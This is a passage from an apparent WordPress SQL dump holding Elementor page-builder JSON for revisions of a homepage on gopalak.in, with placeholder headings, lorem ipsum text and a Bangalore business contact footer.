here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8632,1505,'_elementor_page_assets','a:0:{}'),(8634,1506,'_elementor_edit_mode','builder'),(8635,1506,'_elementor_template_type','wp-page'),(8636,1506,'_elementor_version','3.7.7'),(8637,1506,'_wp_page_template','elementor_canvas'),(8638,1506,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8639,1506,'_elementor_page_assets','a:0:{}'),(8673,1508,'_elementor_edit_mode','builder'),(8674,1508,'_elementor_template_type','wp-page'),(8675,1508,'_elementor_version','3.7.7'),(8676,1508,'_wp_page_template','elementor_canvas'),(8677,1508,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\